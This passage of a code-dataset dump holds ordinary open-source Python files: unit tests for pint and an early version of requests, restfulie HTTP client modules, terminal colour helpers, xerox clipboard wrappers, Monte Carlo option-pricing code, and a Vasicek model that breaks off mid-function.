metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JNRowe-retired/pint",
"score": 3
} |
#### File: pint/testsuite/test_quantity.py
```python
from __future__ import division, unicode_literals, print_function, absolute_import
import copy
import math
import operator as op
from pint.unit import UnitsContainer
from pint import DimensionalityError, UndefinedUnitError
from pint.testsuite import TestCase, string_types, PYTHON3
class TestQuantity(TestCase):
FORCE_NDARRAY = False
def _test_inplace(self, operator, value1, value2, expected_result):
if isinstance(value1, string_types):
value1 = self.Q_(value1)
if isinstance(value2, string_types):
value2 = self.Q_(value2)
if isinstance(expected_result, string_types):
expected_result = self.Q_(expected_result)
value1 = copy.copy(value1)
value2 = copy.copy(value2)
id1 = id(value1)
id2 = id(value2)
value1 = operator(value1, value2)
value2_cpy = copy.copy(value2)
self.assertAlmostEqual(value1, expected_result)
self.assertEqual(id1, id(value1))
self.assertAlmostEqual(value2, value2_cpy)
self.assertEqual(id2, id(value2))
def _test_not_inplace(self, operator, value1, value2, expected_result):
if isinstance(value1, string_types):
value1 = self.Q_(value1)
if isinstance(value2, string_types):
value2 = self.Q_(value2)
if isinstance(expected_result, string_types):
expected_result = self.Q_(expected_result)
id1 = id(value1)
id2 = id(value2)
value1_cpy = copy.copy(value1)
value2_cpy = copy.copy(value2)
result = operator(value1, value2)
self.assertAlmostEqual(expected_result, result)
self.assertAlmostEqual(value1, value1_cpy)
self.assertAlmostEqual(value2, value2_cpy)
self.assertNotEqual(id(result), id1)
self.assertNotEqual(id(result), id2)
def test_quantity_creation(self):
for args in ((4.2, 'meter'),
(4.2, UnitsContainer(meter=1)),
('4.2*meter', ),
('4.2/meter**(-1)', ),
(self.Q_(4.2, 'meter'),)):
x = self.Q_(*args)
self.assertEqual(x.magnitude, 4.2)
self.assertEqual(x.units, UnitsContainer(meter=1))
x = self.Q_(None, UnitsContainer(length=1))
self.assertEqual(x.magnitude, None)
self.assertEqual(x.units, UnitsContainer(length=1))
x = self.Q_(4.2, UnitsContainer(length=1))
y = self.Q_(x)
self.assertEqual(x.magnitude, y.magnitude)
self.assertEqual(x.units, y.units)
self.assertIsNot(x, y)
x = self.Q_(4.2, None)
self.assertEqual(x.magnitude, 4.2)
self.assertEqual(x.units, UnitsContainer())
def test_quantity_bool(self):
self.assertTrue(self.Q_(1, None))
self.assertTrue(self.Q_(1, 'meter'))
self.assertFalse(self.Q_(0, None))
self.assertFalse(self.Q_(0, 'meter'))
def test_quantity_comparison(self):
x = self.Q_(4.2, 'meter')
y = self.Q_(4.2, 'meter')
z = self.Q_(5, 'meter')
j = self.Q_(5, 'meter*meter')
self.assertTrue(x == x)
self.assertFalse(x != x)
self.assertTrue(x <= y)
self.assertTrue(x >= y)
self.assertFalse(x < y)
self.assertFalse(x > y)
self.assertTrue(x != z)
self.assertTrue(x < z)
self.assertTrue(z != j)
self.assertNotEqual(z, j)
self.assertEqual(self.Q_(0, 'meter'), self.Q_(0, 'centimeter'))
self.assertNotEqual(self.Q_(0, 'meter'), self.Q_(0, 'second'))
self.assertLess(self.Q_(10, 'meter'), self.Q_(5, 'kilometer'))
def test_quantity_comparison_convert(self):
self.assertEqual(self.Q_(1000, 'millimeter'), self.Q_(1, 'meter'))
self.assertEqual(self.Q_(1000, 'millimeter/min'), self.Q_(1000/60, 'millimeter/s'))
def test_quantity_repr(self):
x = self.Q_(4.2, UnitsContainer(meter=1))
self.assertEqual(str(x), '4.2 meter')
self.assertEqual(repr(x), "<Quantity(4.2, 'meter')>")
def test_quantity_format(self):
x = self.Q_(4.12345678, UnitsContainer(meter=2, kilogram=1, second=-1))
for spec, result in (('{}', str(x)), ('{!s}', str(x)), ('{!r}', repr(x)),
('{0.magnitude}', str(x.magnitude)), ('{0.units}', str(x.units)),
('{0.magnitude!s}', str(x.magnitude)), ('{0.units!s}', str(x.units)),
('{0.magnitude!r}', repr(x.magnitude)), ('{0.units!r}', repr(x.units)),
('{:.4f}', '{:.4f} {!s}'.format(x.magnitude, x.units)),
('{:!l}', r'4.12345678 \frac{kilogram \cdot meter^{2}}{second}'),
('{:!p}', '4.12345678 kilogram·meter²/second'),
('{:!s~}', '4.12345678 kg * m ** 2 / s'),
('{:!l~}', r'4.12345678 \frac{kg \cdot m^{2}}{s}'),
('{:!p~}', '4.12345678 kg·m²/s')
):
self.assertEqual(spec.format(x), result)
def test_quantity_add_sub(self):
x = self.Q_(1., 'centimeter')
y = self.Q_(1., 'inch')
z = self.Q_(1., 'second')
a = self.Q_(1., None)
self._test_not_inplace(op.add, x, x, self.Q_(2., 'centimeter'))
self._test_not_inplace(op.add, x, y, self.Q_(1 + 2.54, 'centimeter'))
self._test_not_inplace(op.add, y, x, self.Q_(1 + 1 / 2.54, 'inch'))
self._test_not_inplace(op.add, a, 1, self.Q_(1 + 1, None))
self.assertRaises(DimensionalityError, op.add, 10, x)
self.assertRaises(DimensionalityError, op.add, x, 10)
self.assertRaises(DimensionalityError, op.add, x, z)
self._test_not_inplace(op.sub, x, x, self.Q_(0., 'centimeter'))
self._test_not_inplace(op.sub, x, y, self.Q_(1 - 2.54, 'centimeter'))
self._test_not_inplace(op.sub, y, x, self.Q_(1 - 1 / 2.54, 'inch'))
self._test_not_inplace(op.sub, a, 1, self.Q_(1 - 1, None))
self.assertRaises(DimensionalityError, op.sub, 10, x)
self.assertRaises(DimensionalityError, op.sub, x, 10)
self.assertRaises(DimensionalityError, op.sub, x, z)
def test_quantity_iadd_isub(self):
x = self.Q_(1., 'centimeter')
y = self.Q_(1., 'inch')
z = self.Q_(1., 'second')
a = self.Q_(1., None)
self._test_inplace(op.iadd, x, x, self.Q_(2., 'centimeter'))
self._test_inplace(op.iadd, x, y, self.Q_(1 + 2.54, 'centimeter'))
self._test_inplace(op.iadd, y, x, self.Q_(1 + 1 / 2.54, 'inch'))
self._test_inplace(op.iadd, a, 1, self.Q_(1 + 1, None))
self.assertRaises(DimensionalityError, op.iadd, 10, x)
self.assertRaises(DimensionalityError, op.iadd, x, 10)
self.assertRaises(DimensionalityError, op.iadd, x, z)
self._test_inplace(op.isub, x, x, self.Q_(0., 'centimeter'))
self._test_inplace(op.isub, x, y, self.Q_(1 - 2.54, 'centimeter'))
self._test_inplace(op.isub, y, x, self.Q_(1 - 1 / 2.54, 'inch'))
self._test_inplace(op.isub, a, 1, self.Q_(1 - 1, None))
self.assertRaises(DimensionalityError, op.sub, 10, x)
self.assertRaises(DimensionalityError, op.sub, x, 10)
self.assertRaises(DimensionalityError, op.sub, x, z)
def test_quantity_mul_div(self):
self._test_not_inplace(op.mul, 10.0, '4.2*meter', '42*meter')
self._test_not_inplace(op.mul, '4.2*meter', 10.0, '42*meter')
self._test_not_inplace(op.mul, '4.2*meter', '10*inch', '42*meter*inch')
self._test_not_inplace(op.truediv, 42, '4.2*meter', '10/meter')
self._test_not_inplace(op.truediv, '4.2*meter', 10.0, '0.42*meter')
self._test_not_inplace(op.truediv, '4.2*meter', '10*inch', '0.42*meter/inch')
def test_quantity_imul_idiv(self):
#self._test_inplace(op.imul, 10.0, '4.2*meter', '42*meter')
self._test_inplace(op.imul, '4.2*meter', 10.0, '42*meter')
self._test_inplace(op.imul, '4.2*meter', '10*inch', '42*meter*inch')
#self._test_not_inplace(op.truediv, 42, '4.2*meter', '10/meter')
self._test_inplace(op.itruediv, '4.2*meter', 10.0, '0.42*meter')
self._test_inplace(op.itruediv, '4.2*meter', '10*inch', '0.42*meter/inch')
def test_quantity_floordiv(self):
self._test_not_inplace(op.floordiv, 10.0, '4.2*meter', '2/meter')
self._test_not_inplace(op.floordiv, '24*meter', 10.0, '2*meter')
self._test_not_inplace(op.floordiv, '10*meter', '4.2*inch', '2*meter/inch')
#self._test_inplace(op.ifloordiv, 10.0, '4.2*meter', '2/meter')
self._test_inplace(op.ifloordiv, '24*meter', 10.0, '2*meter')
self._test_inplace(op.ifloordiv, '10*meter', '4.2*inch', '2*meter/inch')
def test_quantity_abs_round(self):
x = self.Q_(-4.2, 'meter')
y = self.Q_(4.2, 'meter')
# In Python 3+ round of x is delegated to x.__round__, instead of round(x.__float__)
# and therefore it can be properly implemented by Pint
for fun in (abs, op.pos, op.neg) + (round, ) if PYTHON3 else ():
zx = self.Q_(fun(x.magnitude), 'meter')
zy = self.Q_(fun(y.magnitude), 'meter')
rx = fun(x)
ry = fun(y)
self.assertEqual(rx, zx, 'while testing {}'.format(fun))
self.assertEqual(ry, zy, 'while testing {}'.format(fun))
self.assertIsNot(rx, zx, 'while testing {}'.format(fun))
self.assertIsNot(ry, zy, 'while testing {}'.format(fun))
def test_quantity_float_complex(self):
x = self.Q_(-4.2, None)
y = self.Q_(4.2, None)
z = self.Q_(1, 'meter')
for fun in (float, complex):
self.assertEqual(fun(x), fun(x.magnitude))
self.assertEqual(fun(y), fun(y.magnitude))
self.assertRaises(DimensionalityError, fun, z)
def test_to_base_units(self):
x = self.Q_('1*inch')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254, 'meter'))
x = self.Q_('1*inch*inch')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254 ** 2.0, 'meter*meter'))
x = self.Q_('1*inch/minute')
self.assertAlmostEqual(x.to_base_units(), self.Q_(0.0254 / 60., 'meter/second'))
def test_convert(self):
x = self.Q_('2*inch')
self.assertAlmostEqual(x.to('meter'), self.Q_(2. * 0.0254, 'meter'))
x = self.Q_('2*meter')
self.assertAlmostEqual(x.to('inch'), self.Q_(2. / 0.0254, 'inch'))
x = self.Q_('2*sidereal_second')
self.assertAlmostEqual(x.to('second'), self.Q_(1.994539133 , 'second'))
x = self.Q_('2.54*centimeter/second')
self.assertAlmostEqual(x.to('inch/second'), self.Q_(1, 'inch/second'))
x = self.Q_('2.54*centimeter')
self.assertAlmostEqual(x.to('inch').magnitude, 1)
self.assertAlmostEqual(self.Q_(2, 'second').to('millisecond').magnitude, 2000)
def test_context_attr(self):
self.assertEqual(self.ureg.meter, self.Q_(1, 'meter'))
def test_both_symbol(self):
self.assertEqual(self.Q_(2, 'ms'), self.Q_(2, 'millisecond'))
self.assertEqual(self.Q_(2, 'cm'), self.Q_(2, 'centimeter'))
def test_dimensionless_units(self):
self.assertAlmostEqual(self.Q_(360, 'degree').to('radian').magnitude, 2 * math.pi)
self.assertAlmostEqual(self.Q_(2 * math.pi, 'radian'), self.Q_(360, 'degree'))
self.assertEqual(self.Q_(1, 'radian').dimensionality, UnitsContainer())
self.assertTrue(self.Q_(1, 'radian').dimensionless)
self.assertFalse(self.Q_(1, 'radian').unitless)
self.assertEqual(self.Q_(1, 'meter')/self.Q_(1, 'meter'), 1)
self.assertEqual((self.Q_(1, 'meter')/self.Q_(1, 'mm')).to(''), 1000)
def test_offset(self):
self.assertAlmostEqual(self.Q_(0, 'degK').to('degK'), self.Q_(0, 'degK'))
self.assertAlmostEqual(self.Q_(0, 'degC').to('degK'), self.Q_(273.15, 'degK'))
self.assertAlmostEqual(self.Q_(0, 'degF').to('degK'), self.Q_(255.372222, 'degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'degK').to('degK'), self.Q_(100, 'degK'))
self.assertAlmostEqual(self.Q_(100, 'degC').to('degK'), self.Q_(373.15, 'degK'))
self.assertAlmostEqual(self.Q_(100, 'degF').to('degK'), self.Q_(310.92777777, 'degK'), places=2)
self.assertAlmostEqual(self.Q_(0, 'degK').to('degC'), self.Q_(-273.15, 'degC'))
self.assertAlmostEqual(self.Q_(100, 'degK').to('degC'), self.Q_(-173.15, 'degC'))
self.assertAlmostEqual(self.Q_(0, 'degK').to('degF'), self.Q_(-459.67, 'degF'), 2)
self.assertAlmostEqual(self.Q_(100, 'degK').to('degF'), self.Q_(-279.67, 'degF'), 2)
self.assertAlmostEqual(self.Q_(32, 'degF').to('degC'), self.Q_(0, 'degC'), 2)
self.assertAlmostEqual(self.Q_(100, 'degC').to('degF'), self.Q_(212, 'degF'), 2)
def test_offset_delta(self):
self.assertAlmostEqual(self.Q_(0, 'delta_degK').to('delta_degK'), self.Q_(0, 'delta_degK'))
self.assertAlmostEqual(self.Q_(0, 'delta_degC').to('delta_degK'), self.Q_(0, 'delta_degK'))
self.assertAlmostEqual(self.Q_(0, 'delta_degF').to('delta_degK'), self.Q_(0, 'delta_degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degC').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degF').to('delta_degK'), self.Q_(100 * 9 / 5, 'delta_degK'), places=2)
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degK'), self.Q_(100, 'delta_degK'))
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degC'), self.Q_(100, 'delta_degC'))
self.assertAlmostEqual(self.Q_(100, 'delta_degK').to('delta_degF'), self.Q_(100 * 5 / 9, 'delta_degF'), places=2)
def test_pickle(self):
import pickle
def pickle_test(q):
self.assertEqual(q, pickle.loads(pickle.dumps(q)))
pickle_test(self.Q_(32, ''))
pickle_test(self.Q_(2.4, ''))
pickle_test(self.Q_(32, 'm/s'))
pickle_test(self.Q_(2.4, 'm/s'))
class TestDimensions(TestCase):
FORCE_NDARRAY = False
def test_get_dimensionality(self):
get = self.ureg.get_dimensionality
self.assertEqual(get('[time]'), UnitsContainer({'[time]': 1}))
self.assertEqual(get(UnitsContainer({'[time]': 1})), UnitsContainer({'[time]': 1}))
self.assertEqual(get('seconds'), UnitsContainer({'[time]': 1}))
self.assertEqual(get(UnitsContainer({'seconds': 1})), UnitsContainer({'[time]': 1}))
self.assertEqual(get('[speed]'), UnitsContainer({'[length]': 1, '[time]': -1}))
self.assertEqual(get('[acceleration]'), UnitsContainer({'[length]': 1, '[time]': -2}))
def test_dimensionality(self):
x = self.Q_(42, 'centimeter')
x.to_base_units()
x = self.Q_(42, 'meter*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 1.}))
x = self.Q_(42, 'meter*second*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 2.}))
x = self.Q_(42, 'inch*second*second')
self.assertEqual(x.dimensionality, UnitsContainer({'[length]': 1., '[time]': 2.}))
self.assertTrue(self.Q_(42, None).dimensionless)
self.assertFalse(self.Q_(42, 'meter').dimensionless)
self.assertTrue((self.Q_(42, 'meter') / self.Q_(1, 'meter')).dimensionless)
self.assertFalse((self.Q_(42, 'meter') / self.Q_(1, 'second')).dimensionless)
self.assertTrue((self.Q_(42, 'meter') / self.Q_(1, 'inch')).dimensionless)
``` |
{
"source": "JNRowe-retired/requests",
"score": 3
} |
#### File: JNRowe-retired/requests/test_requests.py
```python
from __future__ import with_statement
import unittest
import cookielib
import requests
class RequestsTestSuite(unittest.TestCase):
"""Requests test cases."""
def setUp(self):
pass
def tearDown(self):
"""Teardown."""
pass
def test_invalid_url(self):
self.assertRaises(ValueError, requests.get, 'hiwpefhipowhefopw')
def test_HTTP_200_OK_GET(self):
r = requests.get('http://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTPS_200_OK_GET(self):
r = requests.get('https://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTP_200_OK_GET_WITH_PARAMS(self):
heads = {'User-agent': 'Mozilla/5.0'}
r = requests.get('http://www.google.com/search', params={'q': 'test'}, headers=heads)
self.assertEqual(r.status_code, 200)
def test_HTTP_200_OK_GET_WITH_MIXED_PARAMS(self):
heads = {'User-agent': 'Mozilla/5.0'}
r = requests.get('http://google.com/search?test=true', params={'q': 'test'}, headers=heads)
self.assertEqual(r.status_code, 200)
def test_user_agent_transfers(self):
"""Issue XX"""
heads = {
'User-agent':
'Mozilla/5.0 (github.com/kennethreitz/requests)'
}
r = requests.get('http://whatsmyua.com', headers=heads);
self.assertTrue(heads['User-agent'] in r.content)
heads = {
'user-agent':
'Mozilla/5.0 (github.com/kennethreitz/requests)'
}
r = requests.get('http://whatsmyua.com', headers=heads);
self.assertTrue(heads['user-agent'] in r.content)
def test_HTTP_200_OK_HEAD(self):
r = requests.head('http://google.com')
self.assertEqual(r.status_code, 200)
def test_HTTPS_200_OK_HEAD(self):
r = requests.head('https://google.com')
self.assertEqual(r.status_code, 200)
def test_AUTH_HTTPS_200_OK_GET(self):
auth = ('requeststest', 'requeststest')
url = 'https://convore.com/api/account/verify.json'
r = requests.get(url, auth=auth)
self.assertEqual(r.status_code, 200)
r = requests.get(url)
self.assertEqual(r.status_code, 200)
# reset auto authentication
requests.auth_manager.empty()
def test_POSTBIN_GET_POST_FILES(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post = requests.post(post_url, data={'some': 'data'})
self.assertEqual(post.status_code, 201)
post2 = requests.post(post_url, files={'some': open('test_requests.py')})
self.assertEqual(post2.status_code, 201)
post3 = requests.post(post_url, data='[{"some": "json"}]')
self.assertEqual(post.status_code, 201)
def test_POSTBIN_GET_POST_FILES_WITH_PARAMS(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post2 = requests.post(post_url, files={'some': open('test_requests.py')}, data={'some': 'data'})
self.assertEqual(post2.status_code, 201)
def test_POSTBIN_GET_POST_FILES_WITH_HEADERS(self):
bin = requests.post('http://www.postbin.org/')
self.assertEqual(bin.status_code, 302)
post_url = bin.headers['location']
post2 = requests.post(post_url, files={'some': open('test_requests.py')},
headers = {'User-Agent': 'requests-tests'})
self.assertEqual(post2.status_code, 201)
def test_nonzero_evaluation(self):
r = requests.get('http://google.com/some-404-url')
self.assertEqual(bool(r), False)
r = requests.get('http://google.com/')
self.assertEqual(bool(r), True)
def test_request_ok_set(self):
r = requests.get('http://google.com/some-404-url')
self.assertEqual(r.ok, False)
def test_status_raising(self):
r = requests.get('http://google.com/some-404-url')
self.assertRaises(requests.HTTPError, r.raise_for_status)
r = requests.get('http://google.com/')
self.assertFalse(r.error)
r.raise_for_status()
def test_cookie_jar(self):
"""
.. todo:: This really doesn't test to make sure the cookie is working
"""
jar = cookielib.CookieJar()
self.assertFalse(jar)
requests.get('http://google.com', cookies=jar)
self.assertTrue(jar)
def test_decompress_gzip(self):
r = requests.get('http://api.stackoverflow.com/1.1/users/495995/top-answer-tags')
r.content.decode('ascii')
def test_autoauth(self):
conv_auth = ('requeststest', 'requeststest')
requests.auth_manager.add_auth('convore.com', conv_auth)
r = requests.get('https://convore.com/api/account/verify.json')
self.assertEquals(r.status_code, 200)
def test_unicode_get(self):
requests.get('http://google.com', params={'foo': u'føø'})
requests.get('http://google.com', params={u'føø': u'føø'})
requests.get('http://google.com', params={'føø': 'føø'})
requests.get('http://google.com', params={'foo': u'foo'})
requests.get('http://google.com/ø', params={'foo': u'foo'})
def test_httpauth_recursion(self):
conv_auth = ('<PASSWORD>', '<PASSWORD>')
r = requests.get('https://convore.com/api/account/verify.json', auth=conv_auth)
self.assertEquals(r.status_code, 401)
def test_settings(self):
with requests.settings(timeout=0.0001):
self.assertRaises(requests.Timeout, requests.get, 'http://google.com')
with requests.settings(timeout=10):
requests.get('http://google.com')
def test_nonurlencoded_post_data(self):
requests.post('http://google.com', data='foo')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JNRowe-retired/restfulie-py",
"score": 3
} |
#### File: restfulie-py/restfulie/opensearch.py
```python
import dsl
class OpenSearchDescription(object):
"""
OpenSearchDescription object wraps the OpenSearch logic
"""
def __init__(self, element_tree):
self.url_type = 'application/rss+xml'
self.element_tree = element_tree
def use(self, url_type):
"""
Set the OpenSearch type
"""
self.url_type = url_type
return self
def search(self, searchTerms, startPage):
"""
Make a search with 'searchTerms'
It will find the url_type URL that you have chosen
"""
tag = '{http://a9.com/-/spec/opensearch/1.1/}Url'
urls = self.element_tree.findall(tag)
for url in urls:
if url.get('type') == self.url_type:
template = url.get('template')
template = template.replace('{searchTerms}', searchTerms)
template = template.replace('{startPage?}', str(startPage))
return dsl.Dsl(template).accepts(self.url_type).get()
```
#### File: restfulie-py/restfulie/restfulie.py
```python
from dsl import Dsl
class Restfulie(object):
"""
Restfulie DSL entry point.
"""
@staticmethod
def at(uri):
"""
Create a new entry point for executing requests to the given uri.
"""
return Dsl(uri)
```
#### File: restfulie-py/test/lazy_response_test.py
```python
from multiprocessing import Pipe
from restfulie.response import LazyResponse, Response
from mockito import mock, verify
class lazy_response_test:
def forwarding_attrs_from_real_response_test(self):
response = mock()
response.code = 200
response.body = 'Hello'
child_pipe = None
lazy_response = LazyResponse(child_pipe)
lazy_response._response = response
assert lazy_response.code == 200
assert lazy_response.body == 'Hello'
verify(response).code
verify(response).body
def simple_test(self):
response = ({'status': 200}, 'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
assert lazy_response.code == 200
assert lazy_response.body == 'Hello'
def resource_test(self):
response = ({'status': 200, 'content-type': 'text/plain; charset=utf-8'}, \
'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
assert lazy_response.resource() == 'Hello'
def link_test(self):
response = ({'status': 200, 'link': '</feed>; rel="alternate"'}, 'Hello')
r = Response(response)
pipe, child_pipe = Pipe()
lazy_response = LazyResponse(child_pipe)
pipe.send(r)
link = lazy_response.link('alternate')
assert link.href == '/feed'
assert link.rel == 'alternate'
```
#### File: restfulie-py/test/request_test.py
```python
from restfulie.dsl import Dsl
from restfulie.request import Request
from mockito import mock
from threading import Semaphore
class callable_mock():
def __init__(self):
self.called = 0
def __call__(self, *args, **kwargs):
self.called = self.called + 1
class http_method_test:
def setup(self):
self.dsl = mock(Dsl)
self.request = Request(self.dsl)
def should_make_synchronous_invocations_with_simple_auth(self):
self.dsl.credentials = 'test:test'
self.dsl.callback = None
self.dsl.is_async = False
self.request._process_flow = callable_mock()
self.request()
assert self.request._process_flow.called == 1
def should_make_synchronous_invocations_if_callback_isnt_configured(self):
self.dsl.callback = None
self.dsl.is_async = False
self.request._process_flow = callable_mock()
self.request()
assert self.request._process_flow.called == 1
def should_make_asynchronous_invocations_if_callback_is_configured(self):
self.dsl.callback = lambda: None
self.dsl.is_async = True
self.request._process_async_flow = callable_mock()
self.request()
assert self.request._process_async_flow.called == 1
def should_call_callback_function_on_asynchronous_request(self):
barrier = Semaphore(0)
def callback(request):
barrier.release()
self.dsl.is_async = True
self.dsl.callback = callback
self.dsl.callback_args = ()
self.request._process_flow = lambda payload: None
self.request()
barrier.acquire()
def should_call_callback_on_async_request_and_pass_arguments(self):
barrier = Semaphore(0)
def callback(request, arg1, arg2, arg3):
assert (arg1, arg2, arg3) == (1, 2, 3)
barrier.release()
self.dsl.is_async = True
self.dsl.callback = callback
self.dsl.callback_args = (1, 2, 3)
self.request._process_flow = lambda payload: None
self.request()
barrier.acquire()
```
#### File: restfulie-py/test/response_test.py
```python
from restfulie.response import Response
class response_test:
def trivial_test(self):
response = ({'status': 200}, 'Hello')
r = Response(response)
assert r.body == 'Hello'
assert r.code == 200
def resource_test(self):
response = ({'status': 200, 'content-type': \
'text/plain; charset=utf-8'}, 'Hello')
r = Response(response)
assert r.resource() == 'Hello'
def link_test(self):
response = ({'status': 200, 'link': '</feed>; rel="alternate"'}, 'Hello')
r = Response(response)
link = r.link('alternate')
assert link.href == '/feed'
assert link.rel == 'alternate'
``` |
{
"source": "JNRowe-retired/terminal",
"score": 2
} |
#### File: terminal/tests/test_color.py
```python
import os
import terminal
from nose.tools import raises
def test_colorize():
print(terminal.colorize('bold', 'bold'))
print(terminal.colorize('red', 'red'))
print(terminal.colorize('red', '#ff0000'))
print(terminal.colorize('red', 'ff0000'))
print(terminal.colorize('red', 'f00'))
print(terminal.colorize('red', (255, 0, 0)))
print(terminal.colorize('gray', (80, 80, 80)))
print(terminal.colorize('red', 'f00', True))
def test_colors():
print(terminal.cyan('cyan color'))
print(terminal.blue('blue color'))
print(terminal.yellow('yellow color'))
print(terminal.magenta('magenta color'))
print(terminal.black('black color'))
print(terminal.white('white color'))
print(terminal.gray('gray color'))
print(terminal.grey('grey color'))
print(terminal.red(terminal.green('green color')))
print(terminal.cyan_bg('cyan background'))
print(terminal.blue_bg('blue background'))
print(terminal.yellow_bg('yellow background'))
print(terminal.magenta_bg('magenta background'))
print(terminal.black_bg('black background'))
print(terminal.white_bg('white background'))
print(terminal.gray_bg('gray background'))
print(terminal.grey_bg('grey background'))
print(terminal.red_bg(terminal.green_bg('green background')))
def test_styles():
print(terminal.bold('bold style'))
print(terminal.faint('faint style'))
print(terminal.italic('italic style'))
print(terminal.underline('underline style'))
print(terminal.blink('blink style'))
print(terminal.overline('overline style'))
print(terminal.inverse('inverse style'))
print(terminal.conceal('conceal style'))
print(terminal.strike('strike style'))
print(terminal.bold(terminal.underline('bold and underline style')))
@raises(ValueError)
def test_hex2ansi():
terminal.hex2ansi('ffbbccd')
@raises(ValueError)
def test_raise_colorize():
print(terminal.colorize('text', {'foo': 'bar'}))
def test_256color():
env = Environ()
env.enable_256color()
print(terminal.gray('gray color'))
print(terminal.gray_bg('gray background'))
env.reset()
class Environ(object):
def __init__(self):
self.term = os.environ.get('TERM', None)
def enable_256color(self):
os.environ['TERMINAL-COLOR'] = 'true'
os.environ['COLORTERM'] = 'true'
os.environ['TERM'] = 'xterm-256color'
def enable_color(self):
os.environ['TERMINAL-COLOR'] = 'true'
os.environ['TERM'] = 'xterm'
def reset(self):
del os.environ['TERMINAL-COLOR']
if 'COLORTERM' in os.environ:
del os.environ['COLORTERM']
if self.term:
os.environ['TERM'] = self.term
class TestColor(object):
def test_property(self):
env = Environ()
env.enable_color()
s = terminal.Color('text')
print(s.bold.red.underline)
print(s.green_bg)
env.reset()
def test_set_attribute(self):
env = Environ()
env.enable_256color()
s = terminal.Color('text')
s.bgcolor = 'red'
s.fgcolor = 'white'
print(s)
s.bgcolor = 'd64'
print(s)
env.reset()
@raises(AttributeError)
def test_property_raise(self):
s = terminal.Color('text')
print(s.unknown)
@raises(AttributeError)
def test_unknown_bg(self):
s = terminal.Color('text')
print(s.unknown_bg)
def test_plus(self):
foo = terminal.Color('foo')
print(foo.green + 'bar')
print('bar' + foo)
assert len(foo) == 3
assert len('bar' + foo) == 6
bar = terminal.Color('foo')
print(foo.green + bar)
print(bar + foo)
@raises(TypeError)
def test_add_raise(self):
foo = terminal.Color('foo')
print(foo.green + 1)
@raises(TypeError)
def test_radd_raise(self):
foo = terminal.Color('foo')
print(1 + foo.green)
def test_repr(self):
foo = terminal.Color('foo')
foo.fgcolor = 'red'
assert repr(foo) == repr(str(foo))
``` |
{
"source": "JNRowe-retired/xerox",
"score": 3
} |
#### File: xerox/xerox/darwin.py
```python
import subprocess
from .base import *
def copy(string):
"""Copy given string into system clipboard."""
try:
subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE).communicate(
string.encode("utf-8"))
except OSError as why:
raise XcodeNotFound
return
def paste():
"""Returns system clipboard contents."""
try:
return subprocess.check_output('pbpaste').decode("utf-8")
except OSError as why:
raise XcodeNotFound
```
#### File: xerox/xerox/linux.py
```python
import subprocess
from .base import *
def copy(string):
"""Copy given string into system clipboard."""
try:
_cmd = ["xclip", "-selection", "clipboard"]
subprocess.Popen(_cmd, stdin=subprocess.PIPE).communicate(
string.encode('utf-8'))
return
except OSError as why:
raise XclipNotFound
def paste():
"""Returns system clipboard contents."""
try:
return subprocess.Popen(["xclip", "-selection", "clipboard", "-o"], stdout=subprocess.PIPE).communicate()[0].decode("utf-8")
except OSError as why:
raise XclipNotFound
``` |
{
"source": "jnrsgsig/joshi_cpp",
"score": 3
} |
#### File: jnrsgsig/joshi_cpp/double_digital.py
```python
from typing import Union
import numpy as np
from payoff import Payoff
class PayoffDoubleDigital(Payoff):
def __init__(self, lower_level_: float, upper_level_: float):
self.lower_level = lower_level_
self.upper_level = upper_level_
def __call__(self, spot_: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return (spot_ > self.lower_level) & (spot_ < self.upper_level)
def __copy__(self):
return self.__class__(self.lower_level, self.upper_level)
if __name__ == '__main__':
pass
```
#### File: jnrsgsig/joshi_cpp/simple_mc.py
```python
import numpy as np
from numpy.random import standard_normal
from vanilla_option import VanillaOption
def simple_monte_carlo(vanilla_option: VanillaOption, spot: float, vol: float, r: float, number_of_paths: int):
expiry = vanilla_option.expiry
variance = vol * vol * expiry
root_variance = np.sqrt(variance)
ito_correction = - 0.5 * variance
moved_spot = spot * np.exp(r * expiry + ito_correction)
this_gaussian = standard_normal(number_of_paths)
this_spot = moved_spot * np.exp(root_variance * this_gaussian)
mean_payoff = vanilla_option.option_payoff(this_spot).mean()
mean_payoff *= np.exp(- r * expiry)
return mean_payoff
if __name__ == '__main__':
pass
``` |
{
"source": "jnrsgsig/python_time_series_models",
"score": 3
} |
#### File: python_time_series_models/models_for_1d_risk_factor/vasicek_model.py
```python
from pprint import pprint
import numpy as np
import matplotlib.pyplot as plt
from time_series_model_template import TimeSeriesModel
class Vasicek(TimeSeriesModel):
def __init__(self):
self.drift = None
self.speed = None
self.target = None
self.volatility = None
def fit_parameters(self, dt, x, method='OLS'):
methods = {'OLS': self.fit_parameters_ols,
'MLE': self.fit_parameters_mle}
methods[method](dt, x)
def fit_parameters_ols(self, dt, x):
x1 = np.vstack((x[:-1], np.ones_like(x[:-1]))).T
y = x[1:]
(a, b), (sum_error2,), _, _ = np.linalg.lstsq(x1, y, rcond=-1)
self.speed = - np.log(a) / dt
self.target = b / (1 - a)
self.drift = self.speed * self.target
self.volatility = np.sqrt(
sum_error2 / (len(y) - 2) / (1 - a**2) * (2 * self.speed * dt))
def fit_parameters_mle(self, dt, x):
pass
def simulate(self, x0, t):
